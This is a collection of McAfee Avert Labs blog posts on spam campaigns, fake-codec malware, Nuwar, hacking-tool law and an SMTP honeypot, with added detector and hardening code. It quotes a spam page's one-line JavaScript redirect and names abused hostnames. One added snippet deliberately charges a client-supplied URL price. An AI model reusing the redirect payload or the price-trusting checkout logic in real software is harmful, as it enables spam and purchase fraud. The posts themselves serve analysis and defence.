This month, McAfee Avert Labs will release the third issue of our security journal “Sage,” which in this edition examines regional issues in security and malware in different parts of the globe. Here at Avert Labs we’re reacting to these trends by reorganizing to deal more effectively with those local and regional challenges. In that vein, I’m proud to announce that Guy Roberts has been named Avert Director of Operations for EMEA (Europe, Middle East, and Africa). Normally we talk only about security threats and trends on the Avert Labs blog, but this is a special occasion.

Guy will be responsible for all anti-virus and anti-spam operations for all of EMEA. Guy has been working in the AV industry for more than 10 years on products for desktop, gateway, and management, and has a broad understanding of customers’ needs. He has also been responsible for turning the McAfee anti-spam technology into an industry-leading messaging solution.

Guy will bring a strong customer focus into the region for Avert Labs as well as continue to help advance our detection and coverage across all technologies!

Blurry lines of privacy

I’ve been fascinated by a couple of articles by Cory Doctorow on the difficulties inherent in the popularity of social networking sites like Facebook, and on the differences between “Myware” and “Spyware”. There’s a lot of food for thought here, primarily regarding the difficulties in assessing another entity’s intent.

As someone who tries to assess intent for a living, I’m immersed in this difficulty on a daily basis. Even if an application developer has a perfectly legitimate intent, the person who is using the application may have another purpose entirely - is the program built such that it can prevent such unauthorized use? This sort of dilemma is what led to the classification of “Potentially Unwanted Programs” - either a program’s original intent falls too far into the grey area or we see an instance where a clearly helpful administrative application is being used in a way that is clearly malicious in intent.

Instances like the XCP Sony DRM rootkit and Sears’ use of the Comscore application really underscore the problem. From the companies’ perspective, they’re doing something perfectly reasonable and harmless to the user. People who find these applications on their machines may feel otherwise, and they may feel that the applications’ actions are inadequately documented or simply intrude too far into the user’s privacy.

The privacy line gets even thinner and more blurry with Social Networking sites, where a certain lack of privacy is inherently part of the equation and generally considered desirable. You can share personal information, pictures, music taste, etc. with all your friends, in one simple, efficient maneuver. It seems perfectly reasonable and simple, given the assumption that “friendship” is a simple black and white matter. Few things in life are ever so simple.

A friend of mine recently joined a social networking site, thinking it would be all about that simple, efficient sharing maneuver. She put all her contact information up, and made it viewable only by her friends. What harm could there be in that? (I talked her into removing it a few minutes later.) Fast forward a few days, when she received a friend request from someone in her past whom, once upon a time, she’d had reason to fear for her physical safety. She had absolutely no desire to be in contact with this person, but there was no way for her to completely block this person from viewing her profile, and for various reasons she felt unable to reject the request directly. She’s more or less given up on this site as a result of that incident. Thank goodness she’d already removed her contact info!

There really is no simple solution to the problem of the thin, blurry line of privacy. There’s no silver bullet that will magically make everyone’s internet experience totally warm and fuzzy. I think the most important thing to take away from this is that we need to constantly be vigilant about maintaining our right to privacy, and to push companies to give us the granularity that lets us decide when and with whom we’ll share our information.

Microsoft’s SkyDrive beta abused by spammers.

“If its free and worth abusing, discovery time is the variable these days.”
(Or rather… spammers are the bane of free services…)

Our labs trapped many thousands of spam messages overnight that abuse the Windows Live SkyDrive beta service launched in August last year (or rather, it’s the new name for Windows Live Folders…). The service allows you to upload up to 1GB of files and share them with anyone via web links. The trapped pill spam promises the usual assurances:

We sell only fda prescription medicine through our fully licensed
pharmacy. orders are overseen by licensed accredited physicians.

http://hostname.bay.livefilestore.com/..Long-url…/adv-filename.html

{english textual bayes poison}

The payload is an HTML file with just one line of HTML at the moment, which redirects your browser to the current incarnation of the spammers’ pill server:

<html><body><script language=JavaScript>window.location.replace(
"http://top10epharms.com")</script></body></html>

We’d expect this to change to obscured script or meta redirection in the not too distant future.

It’s not just spam either, the technique has also been spotted in the labs on blogspot splogs too.
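Added example, not code from the original post or from the SkyDrive service: a small classifier for the kind of hosted file described above, one that has no content of its own and exists only to bounce the visitor elsewhere. It recognises both forms the paragraph above anticipates, a script that assigns window.location (or calls replace/assign on it) and a meta refresh, and reports a page as a pure redirector when a redirect target is present and nothing else would be visible. The first sample is the one-line payload quoted above; the meta-refresh sample and the benign page are constructed, with placeholder hostnames.

```python
"""Recognise HTML files whose only job is to bounce the visitor elsewhere.

Added example, not the post's or SkyDrive's code. SKYDRIVE_PAYLOAD is the
redirector quoted in the post; the other two samples are constructed.
"""
import re
from html.parser import HTMLParser

# The one-line payload quoted in the post.
SKYDRIVE_PAYLOAD = """<html><body><script language=JavaScript>window.location.replace(
"http://top10epharms.com")</script></body></html>"""

# Constructed: the meta-refresh variant the post expects to see next.
META_SAMPLE = ('<html><head><meta http-equiv="refresh" '
               'content="0; url=http://pills.example.invalid/"></head><body></body></html>')

# Constructed: an ordinary page with text and a harmless script.
BENIGN_PAGE = """<html><body><h1>Holiday photos</h1>
<p>Click a thumbnail to enlarge.</p>
<script>var count = 12; document.title = "Photos (" + count + ")";</script>
</body></html>"""

# window.location = "..." / location.href = "..." / location.replace("...")
# / location.assign("..."), with either quote style.
JS_REDIRECT_RE = re.compile(
    r"""(?:window|document|self|top)?\.?location(?:\.href)?\s*(?:=|\.replace\(|\.assign\()\s*["']([^"']+)["']""",
    re.I)


class RedirectSniffer(HTMLParser):
    """Record redirect targets and how much text the page would show."""

    def __init__(self):
        super().__init__()
        self.targets = []        # list of (method, url)
        self.visible_chars = 0   # non-whitespace text outside <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"""url\s*=\s*['"]?([^'"]+)""", attrs.get("content", ""), re.I)
            if m:
                self.targets.append(("meta-refresh", m.group(1).strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for m in JS_REDIRECT_RE.finditer(data):
                self.targets.append(("script", m.group(1)))
        else:
            self.visible_chars += len(data.strip())


def classify_page(html):
    """Return the redirect targets found and whether the page is nothing but a redirect."""
    sniffer = RedirectSniffer()
    sniffer.feed(html)
    sniffer.close()
    return {
        "targets": sniffer.targets,
        "pure_redirector": bool(sniffer.targets) and sniffer.visible_chars == 0,
    }


if __name__ == "__main__":
    for name, page in [("skydrive", SKYDRIVE_PAYLOAD), ("meta", META_SAMPLE), ("benign", BENIGN_PAGE)]:
        print(name, classify_page(page))
```

A file-hosting service that scanned uploads with a check like this would catch the campaign described above on its first sample, since the payload has no legitimate reason to exist as a hosted document; obfuscated script, which the post also anticipates, would need a script interpreter rather than a regex, and the “no visible content” half of the test is what keeps the heuristic useful in that case.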

So what makes services like these worth abusing and attractive to spammers?

  • Unique urls
  • Domains relatively safe from blacklisting
  • Link longevity
  • abuse handling issues
  • Features - host *almost anything*
  • Great Price
  • Someone else pays the hosting costs

It’s a great value proposition for abuse, isn’t it? Well, not really: it’s the same proposition as just about every other file sharing service out there; this one just got hit, big, suddenly. Another interesting point is that the number of times we trapped each URL was remarkably low for such a big campaign, so I’d estimate they had tens of thousands of files uploaded. We’ve seen a few small-scale spam runs using the SkyDrive service dating back to November last year, but they were on a much smaller scale than last night’s campaign. I’m sure it won’t be too long before it’s used to host other unwelcome content types; I’d like to see more of these online file storage offerings malware-scanning downloads too.

They have a pretty good terms of service document that this spammer is clearly in breach of. I will be honest and say that I am not going to fill out an online abuse form for every individual url though! SkyDrive folks - feel free to get in touch if you’ve not had enough reports ;)

If you try SkyDrive be sure to leave feedback and suggestions here and here, it looks very neat so far.

Bad boy or Good boy’s tool?

The upgrade of the UK's computer crime laws is in progress, and one of the new amendments proposed under the Computer Misuse Act would make the creation and distribution of so-called "hacking tools" a crime. There are strong criticisms coming from the security industry, as many tools that can be used by bad guys to break into a system are also used by good guys to test their systems' security. For example, a network sniffer can be used for eavesdropping as well as for troubleshooting a network. It depends on the context in which the tool is being used, and marking any such tools as "hacking tools" and making them unavailable for distribution could hinder the work of system administrators and vulnerability researchers. These amendments are not in force at present and may be applied later this year.

After many concerns were raised by the industry, the government is considering a few of them and is recognizing the "dual use" status of some such tools. The prosecutor would need to prove that the author wrote the tool with malicious intent in order to find him guilty, but the distribution of such tools may still be considered a crime. The Crown Prosecution Service will look for answers to the following questions when determining whether someone is guilty or not:

- Has the article been developed primarily, deliberately and for the sole purpose of committing a CMA offence (i.e. unauthorized access to computer material)?

- Is the article available on a wide scale commercial basis and sold through legitimate channels?

- Is the article widely used for legitimate purposes?

- Does it have a substantial installation base?

- What was the context in which the article was used to commit the offense compared with its original intended purpose?

The following were my primary sources of information:

The Register, LightBlueTouchPaper and CPS.

IT laws can always be tricky to write and implement, and this law will surely raise many eyebrows. Though it may help bring bad guys to justice, it will also make legitimate good guys nervous about creating new tools and distributing them.

Benazir Bhutto Assassination: New Avenue for Spreading Malware

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.

Claiming to be a new HD codec, these malware authors attempt to social-engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites have been observed hosting this fake video (at the time of writing), which redirects users to a typo-squatted domain containing the fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is not something novel. One of the recent high profile attacks which pointed to a malicious script from the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites which attempt drive-by installations when unsuspecting users visit websites returned by search engine results for "Benazir Bhutto". Many of these compromised webpages have malicious scripts injected into them which point to the 3322 domain. These webpages contain obfuscated variants of the MS06-014 exploit, which is perhaps one of the most popular of all the exploits we see on a daily basis.

This fake Trojan codec is detected by the current DATs as Puper. The downloaded exploit is detected as VBS/Psyme and the executable is detected as Generic Downloader.c.

(Credits to Pradeep Govindaraju for the great malware analysis)

games-pro spam, Yahoo and Google “Feeling Lucky”

Spammers have been abusing free hosting for a long time. Yahoo's Geocities was pretty heavily targeted in its day, and more recently Google's Googlepages and Blogspot are the abused services of choice. The general idea is that spammers can get 1-20+ thousand accounts a day with unique URLs and point them at a handful of spammed domains that they had to pay for.[1] It's improbable that any external party can compile a complete list of the abused accounts, report them to the host, and have the host engage somebody clueful 24/7 to take down the sites in any reasonable time period to make the spammer's campaign ineffective.[2]

I know, I’ve tried!

Those of you that read this blog a year and a quarter ago will remember that the metric truckload of accounts is often provided as a paid service to spammers if they are not able to perform the required tasks in house.

- Spammers have also been abusing the free blog services for a long time. (and setting up their own fakes)

- Spammers have also been abusing the free tiny url services for a long time. (and setting up their own fakes)

There is a common theme here! Free services that allow or facilitate blind redirection. It's all about getting emails through and links in front of victims, and as a rule of thumb, the more popular the service you abuse, the less likely it is to be blocked by the blacklists. SURBL have an open letter to redirection services if you want some more education on the subject from the blacklist perspective. [3]

It’s no surprise that the next popular service to be abused is the search engines. To be clear, I’m not talking about Spamdexing (manipulating text for high search index rankings) or SEO dirty tricks, but (ab)using a search provider as a redirector by using the more advanced search options combined with “Feeling lucky” features that take you to the top search result.

I'll dissect this morning's sample for you, noting one additional point:
- Spammers have also been abusing the free webmail services for a long time.

A quantity of Yahoo webmail spam kindly deposited itself in one of our many millions of spamtraps, DKIM signed, SPF passed, etc. Inside it was a link to a "feeling lucky" link c/o rival search giant Google.

Abused Search Host: http://www.google.com/
Search Function: search?q=
Search Feature Text in the URL: inurl:games-pro
Search Feature Text in the page: intext: won1 million megabet from casino online [4]
Search Invisible Redirect Feature: btnI=Lucky

If you put this lot back together you’ll get an invisible redirect (302) to casino-games-pro that’ll try and auto-install the CasOnline PUP. Charming.
I'd like to point out here that if you try to send a spammy link out via Yahoo webmail they CAPTCHA test the sender (but they also did that when the accounts were set up, right?). The trick here is the fact that there is nothing spammy about a search link. I have no doubt that /btnI=Lucky/ will be hitting the filters at Yahoo's webmail HQ very shortly if it hasn't already.
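A detector for the search-engine-as-redirector link dissected above, as an added example (not the blog's own code): it takes a Google search URL apart into the host, the inurl:/intext: operators and the btnI parameter that turns the result page into a redirect, and scans message text for such links. The search host list, the patterns and the sample spam body are assumptions constructed for illustration.

```python
"""Flag search-engine "I'm Feeling Lucky" links used as invisible redirectors.

Added example, not the blog's code: it reproduces the dissection above
(abused search host, q= carrying inurl:/intext: operators, btnI=... which
turns the result page into a 302 to the top hit). Host list, patterns and
the sample spam text are constructed for illustration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Search hosts to treat as potential redirectors (the blog names google.com).
SEARCH_HOSTS = {"www.google.com", "google.com"}
# Advanced operators spammers use to pin their own site as the top result.
OPERATOR_RE = re.compile(r"\b(inurl|intext|intitle|site):(\S+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def dissect_lucky_url(url: str) -> Optional[Dict[str, object]]:
    """Return the parts of a 'feeling lucky' redirect, or None if this is not one.

    A plain search link (no btnI=) lands the user on a results page, so it is
    not a redirect and is left alone; only the Lucky-button variant is flagged.
    """
    parts = urlparse(url)
    if parts.netloc.lower() not in SEARCH_HOSTS or parts.path != "/search":
        return None
    params = parse_qs(parts.query)
    if "btnI" not in params:
        return None
    query = params.get("q", [""])[0]
    op_map = {op.lower(): value for op, value in OPERATOR_RE.findall(query)}
    return {
        "host": parts.netloc,
        "query": query,
        "operators": op_map,
        # inurl: is what steers the top hit (and so the redirect) to the spammer's domain
        "pinned_target": op_map.get("inurl"),
    }


def find_lucky_redirects(message_text: str) -> List[Dict[str, object]]:
    """Scan message text and return a dissection for every Lucky-redirect URL in it."""
    hits = []
    for url in URL_RE.findall(message_text):
        info = dissect_lucky_url(url)
        if info is not None:
            hits.append(info)
    return hits


# Constructed spam body modelled on the campaign described above.
SAMPLE_SPAM = """Congratulations, you won 1 million megabet!
Claim here: http://www.google.com/search?q=inurl:games-pro+intext:won1+million+megabet+from+casino+online&btnI=Lucky
Unsubscribe: http://www.google.com/search?q=games-pro
"""

if __name__ == "__main__":
    for hit in find_lucky_redirects(SAMPLE_SPAM):
        print("Lucky redirect via", hit["host"], "pinned to", hit["pinned_target"])
```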

The "Feeling Lucky" spam technique is not particularly new, but this webmail twist does show the relentless diversity of spammers' abuse of free services provided by the big players, alongside their abuse of the smaller fish that Kevin blogged about the other day. As he pointed out, the spammers are using the phishers' techniques; how long before we see "btnI=Lucky" in phish?

All of these methods are popular because it's not really possible for RBLs or URIBLs to block them without collateral damage to innocent sites, making it more likely that spammers' links will get through to the inbox. Though when the abuse is more than background noise, things do happen.[5]

[1] Let's assume for ease that they actually do pay; in reality it's stolen card and credential samples from some carder IRC channel.
[2] Testing a random Googlepages link spam from last month shows that everything is still working.
[3] For the record, many shorter-link services took notice rapidly!
[4] Yes, I linked "won1 million megabet from casino online" - so what? I really do hope this blog helps.
[5] Take a look at SBL60999.

Post and Packing scams

Tis the season to be shopping, tra la la la la but don’t get had.

I've stumbled upon a scam where search engine product listings are being (ab)used for the classic ("#1 auction site") +postage scam. Most auction sites have some jokers listing good value items with ridiculous postage or compulsory insurance to even the score. Credit where it is due, the big boys are clamping down on unfair charges, but it's still pretty common for listings to include excessive additional charges: £13 to post a memory stick locally (almost twice the price of the item itself), or £38 to post a Wii.

The scam works like this:

You search for a gadget in your favorite search engine's products section and, as normal, you'll see those highly relevant and usually high-commission links on the first page. Like most people, if you wanted to pay high-street prices you'd have gone to the high street, so the first click is to sort by price. Scrolling past the pages of adapters and cases (if you wanted a case or adapter you'd have searched for it, after all) you'll eventually find the holy grail: the page containing the lowest-priced listing of the actual product you searched for.

[Image: Google]

It is not uncommon to find many web-based storefronts for the same white-label box-shipper, so new stores with juicy offers crop up every day. Since you're an astute shopper, you'd investigate the first couple of links, knowing that you're about to save about 20% or so.

When visiting the site indicated we see that the price is invitingly lower still than the one displayed by the search engine. Bargain!

[Image: Low price site - This site is flagged by SiteAdvisor due to misleading offers]

…along with the somewhat unusual text "Subject to change". Anyway, £4.20 is £4.20, so we decide to click to buy now.

[Image: sting]

£300 is the total, right up there in the top right of the PayPal page. If your PayPal credentials were stored in your browser, that login button would be your destination. If you happened to be logged in to PayPal, the blanks in the form would have been all filled in too. If you were in a rush (and who isn't at this time of year), I'm sure that would have been easily missed.

“Subject to change” hardly covers this one. Just to pour salt on the wound, the actual Post and Packing sting comes on the last page, and after you’ve logged in.

[Image: sting]

£1200! Caveat Emptor, people… "Let The Buyer Beware"
- Merry Christmas one and all.

Hacker targets Mac fan blogs

A self-proclaimed Mac user is targeting Mac fan blogs. He has already defaced 2 famous Mac related blogs.

http://www.applematters.com/

http://iphonematters.com/

[Image: Notice on defaced Mac blogs]

In his own words: "I'M A MAC USER. I JUST HAVE A STRONG DISTASTE FOR MAC SYCOPHANTS."

This is possibly the first time a hacker has targeted Mac-related websites. This is an interesting month for the Mac user base, with multiple Trojans/malware appearing along with a horde of security updates from Apple itself.

Things are definitely heating up in Mac Land!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Update Nov 28th <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Seems that this defacement may in fact be a hoax:

http://www.applematters.com/index.php/section/comments/sincere-apologies/

http://www.applematters.com/index.php/section/comments/a-bad-pr-stunt/

http://www.glennwolsey.com/2007/11/28/what-really-happened-sincere-apologies/

Pretty odd any way you look at it. Also after a bit more digging we came across another Apple defacement (there are a few more with some Googling):

http://networks.silicon.com/webwatch/0,39024667,39158606,00.htm?r=1

Cyber Jihad Isn’t Here Yet

There's a lot of hype circulating about a Jihad application meant to wage cyber war in the near future. A lot of people have speculated, and while the experts are dismissive, the topic is still getting a lot of press and worrying average users. I took a bit of time to examine the binary and I don't believe it poses a huge threat. Here are my reasons why:

  1. The program is written in Visual Basic. While there’s nothing wrong with that, VB is not the preferred programming language of very many professionals. C\C++\C# would tend to be better choices for complicated and efficient programs. VB tends to be a language for quick applications or for those beginning programming.
  2. There is a tracking website required to use the application. Terrorists don't like to be tracked. Further, the site tracks referrals – thus it would be trivial to create cliques of users, which again is something terrorists would be desperate to avoid.
  3. The website variables are in English. Extremists/Islamic Jihadists tend to not speak English, remember all the stories about the few English speakers they use? These guys have some understanding of English – indicating they might not be the stereotypical terrorist.
  4. The web url is hard coded and it’s to a real web server. We’re in an age of dynamic dns and fast flux. A static/real url is very amateur and easily blocked.
  5. There didn’t appear to be capability to dynamically update the program remotely – this would be key for updates and avoiding being blocked. I did a VERY QUICK analysis, but didn’t see this capability.
  6. The executable wasn’t encrypted and didn’t fight malware analysis – real malware writers love to do malicious things to AV guys. They weren’t in this executable.
  7. The webserver had FrontPage extensions – this again just seems out of place for cyber war.

All told, the little bits of analysis make the code look to be written by high school or early college kids. If their network gets large enough, maybe they could cause harm. Right now the webserver isn't working and the app seems like a no-go. I'd suggest everyone block traffic to the server http://al-jinan.net and stop worrying.

New Rule

All companies, software, and websites need to have a clear means of receiving information about vulnerabilities. Every application has vulnerabilities, and sometimes third parties just happen to see them. I was using a web app for a local diamond dealer. Clearly they deal with a high-value product that should be well protected. While I was browsing the site, I noticed that it appeared to use GET requests to pass item and price information. It turns out that the two aren't cross-verified on the back end: it was possible to change the price. Maybe they have internal processes to verify the price, but maybe not. Likewise, if an evil attacker uses the vulnerability, is the merchant bound to the price they charged to the credit card? They also allowed negative prices. Would the third-party credit card servicing site happily provide a chargeback?
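The defect described above beside its fix, as an added example (not the merchant's code): the vulnerable handler charges whatever price the query string carries, including a negative one, while the hardened handler prices the order from a server-side catalogue, validates the quantity and only uses the client's price as a tampering indicator. The catalogue, SKUs, prices and URLs are constructed for illustration.

```python
"""GET-parameter price tampering: the defect described above, beside its fix.

Added example, not the merchant's code. The storefront passed item and price
in the query string and never cross-checked them on the back end; that is
what vulnerable_total() does. hardened_total() treats the query string as
untrusted, prices the order from the server-side catalogue, and rejects bad
quantities. Catalogue, SKUs, prices and URLs are constructed.
"""
from decimal import Decimal, InvalidOperation
from typing import Dict
from urllib.parse import parse_qs, urlparse

# Constructed catalogue: SKU -> unit price. The only price source that counts.
CATALOGUE: Dict[str, Decimal] = {
    "RING-1042": Decimal("2450.00"),
    "STUD-0077": Decimal("615.00"),
}
MAX_QTY = 10


class CheckoutError(ValueError):
    """Raised when a request cannot be priced from server-side data."""


def _query_params(url: str) -> Dict[str, str]:
    """First value of each query-string parameter (what a typical web framework hands you)."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def vulnerable_total(url: str) -> Decimal:
    """The defect: the amount charged is whatever the client put in the URL.

    A shopper can rewrite price=2450.00 to price=1, or even to a negative
    number, and this function passes it straight on to the card processor.
    """
    params = _query_params(url)
    return Decimal(params["price"]) * int(params.get("qty", "1"))


def hardened_total(url: str) -> Dict[str, object]:
    """Price the order from the catalogue; the client's price is only an indicator."""
    params = _query_params(url)
    sku = params.get("item")
    if sku not in CATALOGUE:
        raise CheckoutError("unknown item")
    try:
        qty = int(params.get("qty", "1"))
    except ValueError:
        raise CheckoutError("quantity is not an integer")
    if not 1 <= qty <= MAX_QTY:
        raise CheckoutError("quantity out of range")
    unit_price = CATALOGUE[sku]

    # Any client-supplied price is ignored for charging, but a mismatch is worth
    # logging: a legitimate client always echoes the price the server showed it.
    tampered = False
    if "price" in params:
        try:
            tampered = Decimal(params["price"]) != unit_price
        except InvalidOperation:
            tampered = True

    return {
        "sku": sku,
        "qty": qty,
        "unit_price": unit_price,
        "total": unit_price * qty,
        "tampered": tampered,
    }


if __name__ == "__main__":
    request = "https://shop.example/checkout?item=RING-1042&price=-1.00&qty=1"
    print("vulnerable charges:", vulnerable_total(request))
    print("hardened charges:  ", hardened_total(request)["total"])
```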

I've tried to contact the merchant, but I just can't seem to get through to anyone who understands the problem. I only want someone who understands the potential problem to be aware of it so that they can accept the risk or go about fixing it. So, New Rule: if you have an application (web or otherwise) you MUST have a clear means of receiving vulnerability information.

2008 US election campaign spam

As a Brit I've always predicted that with the upcoming US elections the online battle will be the most interesting part for me (aside from the comedy, of course). So imagine my surprise when I'm greeted by this lot over the weekend:

Subject: Ron Paul Eliminates The IRS!

Subject: Iraq Scam Exposed, Ron Paul

Subject: IRS Fears Ron Paul?

Subject: Ron Paul Wins GOP Debate!

Subject: Ron Paul Exposes Federal Reserve

Etc.

They all linked to YouTube searches for "ron paul", which return the usual electoral propaganda you'd expect 372 days before an election.

Later in the day it changed, however. With the usual addition of Bayes poison, randomness in the subject lines and a tinyurl, and no doubt some additional sending resources since they'd just burned a load, this campaign moved up a gear.

Subject: Ron Paul Wins GOP Debate! ydB

Subject: Ron Paul Wins GOP Debate! XZHMuk

Subject: Iraq Scam Exposed, Ron Paul qCnUa

Subject: IRS Fears Ron Paul? edukDy

Subject: Who Is Ron Paul? lyI

Subject: Ron Paul Stops Iraq War! nALGU

This is trivial stuff as I’m sure you can appreciate, but that tinyurl did catch my attention:

tinyurl 345s6g -redirects-> 301 Moved Permanently -to-> http://www.youtube.com/watch?v=AeHWW5gbc0w

This video has been removed due to terms of use violation.
Now I have no idea what that video was (and frankly, my dear, I don't give a damn!) but what struck me is that this would be a really efficient way to remove your competition's videos from YouTube. I'm not picking on YouTube here; I believe almost any social site would do the same.

There are 2 people I feel for in this messy situation: postmaster@*.gov and abuse@youtube.com ;)
You'll be seeing lots of this stuff in the coming months, the most worrying of which will be the false donation solicitations, finishing with incorrect dates for the actual polling day!

I wonder how many candidates have EV certs or "security logos" on their donation sites?

Nuwar: new file names

We all know that the Nuwar, aka Storm, gang has been continuously changing their spam email text, download sites, executables, network traffic patterns, etc. in their efforts to penetrate the security defenses at various layers, all throughout this year. I had a chance to briefly look at a 'fresh' Nuwar sample this weekend. It is interesting that they have now also changed the names of the files Nuwar drops. It now drops noskrnl.exe, noskrnl.sys and noskrnl.config instead of Spooldr.exe, Spooldr.sys, and Spooldr.ini respectively. It also tried to actively propagate by copying itself to the floppy drive, which is new.

It is not the first time that the names of the dropped files have been changed (it used to be wincom earlier this year), but they had not changed in the past few months. Users, especially those who use system diagnostic tools, should exercise caution in distinguishing noskrnl from the legitimate ntoskrnl.exe. Perhaps spooldr had become too well known for the author's comfort; search results for spooldr clearly indicate what it is, but not for noskrnl for the time being. Anyway, we detect these as Tibs-Packed.

Two dead spammers?

It seems that today someone invented a new way of fighting spam. The idea is simple—scare spammers to death by circulating a hoax that one of their ilk has just been murdered! It would not take long for people to conclude that such a poor fate might be related to the professional activities of the deceased. The following blog appeared today on one of the anonymous sites and immediately got wide attention:

[Image of loonov.com]

To reinforce the story they even included a reference to a real story back from 2005 when the most prolific Russian spammer—Vardan Kushnir—was killed in Moscow. There is a big “but” here though. The widespread belief that the murder of Vardan Kushnir in July 2005 was related to spam distribution collapsed after the real killers were detained one month later. It’s ironic, though perhaps typical of how media works, that unfounded speculations received much wider publicity than the facts that became available once the murder case was closed.

As much as we at McAfee Avert Labs would like to reduce the level of spam, we just have to conclude that spammers can still sleep well at night. :-)

Spread the word, not the virus!

Organizations have traditionally blocked outbound Simple Mail Transfer Protocol (SMTP) traffic on port 25 that originates from the local area network (LAN) and virtual private network (VPN) segments. This is done to prevent any internal machine that has been infected with a mass-mailer from spamming the outside world. Email can be traced back to its origin via the IP address information contained in the mail header, and no organization wants to be held responsible for spreading malware onto the internet – it would be a public relations nightmare.

By blocking port 25 at the firewall, an organization prevents a mass-mailer from spreading. However, by blindly blocking outgoing SMTP traffic, valuable information on real-time internal infections or data leakage arising from threats that use port 25 is lost.

In this month’s Oct 2007 edition of Virus Bulletin, we proposed the need for an in-house SMTP honeypot. A copy of this article titled “The need for an in-house SMTP Honeypot” can be downloaded from our McAfee Avert Labs Technical White Papers page.

Simple Mail Transfer Protocol honeypots have traditionally been used to masquerade as open-relays in order to frustrate spammers and harvest spam. With changed spammer tactics over the years, it is high time we revisited traditional countermeasures and improved upon them.
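One way to get that lost visibility back, as an added example that is not the code from the Virus Bulletin article: the session logic of an internal SMTP honeypot that outbound port 25 traffic is redirected to. It accepts the envelope and headers an infected host offers, never relays, and records an alert naming the internal source IP, the HELO name, sender, recipients and subject. The honeypot hostname, the recipient threshold and the sample transcript are assumptions constructed for illustration.

```python
"""In-house SMTP honeypot session logic (added example, not the Virus Bulletin article's code).

Outbound port 25 from the LAN is redirected here instead of being dropped: the session speaks
just enough SMTP for an infected host to hand over its envelope and headers, never relays
anything, and records an alert naming the internal source. Hostname, threshold and the
sample transcript are constructed for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple

HONEYPOT_NAME = "smtp-honeypot.corp.example"   # constructed hostname
MASS_MAIL_RCPT_THRESHOLD = 5                   # recipients per message => mass-mailer
_ADDR_RE = re.compile(r"<([^>]*)>")
Alert = Dict[str, object]   # one captured message; any hit matters, real clients use the relay


class HoneypotSession:
    """Drives one client connection. feed(line) returns the reply to send ('' inside DATA)."""

    def __init__(self, client_ip: str) -> None:
        self.client_ip = client_ip
        self.helo: Optional[str] = None
        self.alerts: List[Alert] = []
        self._reset_envelope()

    def _reset_envelope(self) -> None:
        self.sender: Optional[str] = None
        self.recipients: List[str] = []
        self.in_data = False
        self.data_lines: List[str] = []

    def feed(self, line: str) -> str:
        line = line.rstrip("\r\n")
        if self.in_data:
            if line == ".":
                self._capture()
                self._reset_envelope()
                return "250 OK queued\r\n"      # a lie: nothing is ever delivered
            # undo SMTP dot-stuffing, then keep the line for header extraction
            self.data_lines.append(line[1:] if line.startswith("..") else line)
            return ""
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        address = _ADDR_RE.search(arg)
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip() or None
            return f"250 {HONEYPOT_NAME}\r\n"
        if verb in ("MAIL", "RCPT") and not address:
            return "501 syntax error\r\n"
        if verb == "MAIL":
            self.sender = address.group(1)
            return "250 OK\r\n"
        if verb == "RCPT":
            if self.sender is None:
                return "503 need MAIL first\r\n"
            self.recipients.append(address.group(1))
            return "250 OK\r\n"                 # accept everyone: keep the client talking
        if verb == "DATA":
            if not self.recipients:
                return "503 need RCPT first\r\n"
            self.in_data = True
            return "354 end data with <CRLF>.<CRLF>\r\n"
        if verb == "QUIT":
            return "221 bye\r\n"
        return "502 command not implemented\r\n"

    def _capture(self) -> None:
        subject = None
        for header in self.data_lines:
            if header == "":                    # blank line ends the header block
                break
            if header.lower().startswith("subject:"):
                subject = header[len("subject:"):].strip()
                break
        self.alerts.append({
            "client_ip": self.client_ip, "helo": self.helo, "sender": self.sender or "",
            "recipients": list(self.recipients), "subject": subject,
            "mass_mailer": len(self.recipients) >= MASS_MAIL_RCPT_THRESHOLD})


def replay(client_ip: str, client_lines: List[str]) -> Tuple[List[Alert], List[str]]:
    """Run a captured client transcript through one session; return alerts and our replies."""
    session = HoneypotSession(client_ip)
    replies = [f"220 {HONEYPOT_NAME} ESMTP\r\n"]
    for line in client_lines:
        reply = session.feed(line)
        if reply:
            replies.append(reply)
    return session.alerts, replies


# Constructed transcript: what a mass-mailer on an internal workstation would send.
SAMPLE_TRANSCRIPT = [
    "HELO workstation-23",
    "MAIL FROM:<bob@corp.example>",
    *[f"RCPT TO:<victim{i}@example.net>" for i in range(5)],
    "DATA",
    "Subject: Undeliverable message",
    "",
    ".",
    "QUIT",
]
```

A real listener wraps a session per accepted socket, writes each non-empty reply back, and ships the alerts to whatever the SOC already watches; the source IP in the alert is the infected host to isolate.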

At least we don’t have caterpillars!

Thought I’d pass along some Friday giggles to take you all into the weekend.

In a former job incarnation I was a florist, which has left me with certain plant-geek tendencies. It's very rare for my security-geek and plant-geek worlds to cross, but today they did. Apparently certain plants which grow by underground runners (or "stolons") use those connections as a sort of instant messaging platform.

On the plus side, if one plant is attacked by caterpillars, the rest will fortify themselves against attack. On the minus side, if one plant gets infected with a virus, so will the rest of them.

Clearly clovers lack the resources for a proper layered defense strategy.

Maybe they're not up to date on their software patches or security updates. …Or maybe they've been falling for clover social engineering - some mischievous clover sending nasty links by IM.

Bad month for malware authors

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

